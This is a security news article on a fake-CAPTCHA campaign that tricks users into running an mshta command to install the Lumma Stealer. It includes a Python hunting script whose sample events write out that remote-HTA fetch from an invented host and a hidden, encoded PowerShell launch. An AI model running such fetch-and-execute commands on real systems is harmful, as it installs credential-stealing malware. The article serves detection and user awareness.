Security researchers warn of fake CAPTCHA campaign spreading Lumma malware
Security researchers from Netskope Threat Labs have issued a warning about a global cyberattack campaign using fake CAPTCHAs to spread the Lumma Stealer malware. This sophisticated scam has already targeted victims across multiple countries, including the United States, Argentina, and the Philippines. It has also targeted various sectors, from healthcare and banking to marketing and telecom.
The attackers are tricking users into running malicious commands on their computers through cleverly disguised fake CAPTCHA challenges. A CAPTCHA is typically used to verify that a website visitor is human, but in this case, the fake CAPTCHA directs victims to unwittingly execute commands that infect their computers with malware.
Lumma Stealer, the malware being distributed, is a type of software sold as part of the “malware-as-a-service” (MaaS) model, making it accessible to cybercriminals who pay for its use. It has been active since at least 2022 and is designed to steal sensitive data, such as login credentials and financial information.
How it works
Here’s how the attack unfolds:
Redirection to fake CAPTCHA: Victims are redirected to a fraudulent CAPTCHA page that appears legitimate but is part of the infection chain.
Social engineering trick: The fake CAPTCHA instructs users to "verify" themselves by pressing Windows + R to open the Run dialog, pasting a command that the page has already placed on their clipboard, and pressing Enter. The user, not the browser, launches the infection.
Malware execution: The pasted command invokes mshta.exe, a signed, built-in Windows script host, to fetch and run a malicious HTA file from a remote server. Because the download and execution happen in a process started from the Run dialog rather than in the browser, browser-based controls such as download scanning never see them.
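The three steps above leave a recognisable trace in process-creation telemetry: a script host started as a child of explorer.exe (which is what a Win+R launch looks like) with a remote URL on its command line, followed by whatever mshta.exe spawns next. The following detection logic is an added example written for this article, not code from Netskope or from the campaign; it runs over constructed Sysmon-style Event ID 1 records (the field names Image, ParentImage, CommandLine and ProcessId mirror Sysmon's, but the records, hostnames and the base64 blob are made up) and flags the pattern described in the list above.

```python
"""Hunt for ClickFix-style mshta.exe launches in process-creation events.

Added example for this article; the rules and sample events are assumptions,
not indicators published in the Netskope report.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Signed Windows binaries commonly abused to fetch and run a second stage
# (assumed list; extend it to match your own telemetry).
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
# PowerShell -e / -enc / -EncodedCommand followed by a base64 blob (heuristic).
ENCODED_ARG = re.compile(r"-(?:e|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}",
                         re.IGNORECASE)


@dataclass
class Finding:
    process_id: int
    image: str
    parent_image: str
    severity: str
    reasons: List[str] = field(default_factory=list)


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path (accepts / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding if the event matches the fake-CAPTCHA chain, else None."""
    image = _name(event["Image"])
    parent = _name(event["ParentImage"])
    cmdline = event.get("CommandLine", "")
    reasons = []

    # Win+R runs the typed command as a child of explorer.exe, so a script
    # host with a remote URL under explorer.exe matches the "paste and Enter" step.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and REMOTE_URL.search(cmdline):
        reasons.append("script host launched from Run dialog with a remote URL")
    # mshta.exe handed a URL downloads and executes a remote HTA outside the browser.
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        reasons.append("mshta.exe retrieving a remote HTA")
    # Anything mshta.exe spawns is the second stage (typically PowerShell).
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append("second-stage script host spawned by mshta.exe")
    if image in {"powershell.exe", "pwsh.exe"} and ENCODED_ARG.search(cmdline):
        reasons.append("PowerShell started with an encoded command")

    if not reasons:
        return None
    severity = "high" if "mshta.exe" in (image, parent) else "medium"
    return Finding(event["ProcessId"], image, parent, severity, reasons)


def hunt(events: List[dict]) -> List[Finding]:
    """Evaluate every event and keep only the ones that produced a Finding."""
    return [f for f in map(evaluate, events) if f is not None]


# Constructed sample telemetry: two benign launches and the two-stage chain.
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    # A local HTA run by an installer: mshta.exe, but no remote URL, no Run dialog.
    {"ProcessId": 1002, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    # The lure's pasted command (hostname is invented).
    {"ProcessId": 1003, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://captcha.example.invalid/verify.mp4"},
    # The second stage spawned by the HTA (base64 blob is made up).
    {"ProcessId": 1004,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"[{finding.severity}] pid={finding.process_id} "
              f"{finding.parent_image} -> {finding.image}: {'; '.join(finding.reasons)}")
```

The parent-process check is what separates this from a generic "mshta.exe with a URL" rule: the installer-launched local HTA (pid 1002) is ignored, while the Run-dialog launch and its PowerShell child are both reported. In production you would feed real Sysmon or EDR process-creation events into hunt() and treat a "high" finding as an isolate-and-investigate trigger.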
Why this attack is dangerous
The fake CAPTCHA attack is a clever form of social engineering. Even tech-savvy users might fall for it, because they believe they are completing a standard CAPTCHA verification. By moving the critical step outside the browser, the attackers sidestep browser-based protections: there is no download for the browser to scan or block, only a command the user runs themselves through a trusted Windows tool.
Additionally, the campaign uses advanced techniques to avoid security systems, including:
Abusing trusted, signed Windows tools (such as mshta.exe) to fetch and execute malicious code, so that the activity blends in with legitimate system binaries.
Using open-source code snippets to bypass malware detection.
Employing malvertising (malicious ads) to attract victims to their fake CAPTCHA pages.
What you can do to stay safe
Be cautious of CAPTCHAs: A legitimate CAPTCHA never requires you to open the Run dialog, paste a command, or do anything outside the browser. If a CAPTCHA asks you to, stop immediately and close the page.
Use updated security tools: Netskope Advanced Threat Protection provides proactive coverage against many of the different layers involved in this threat.
Avoid downloading cracked software: Many attacks begin with fake or pirated software. Stick to legitimate sources.
Double-check URLs: Be wary of websites that redirect you unexpectedly or seem suspicious.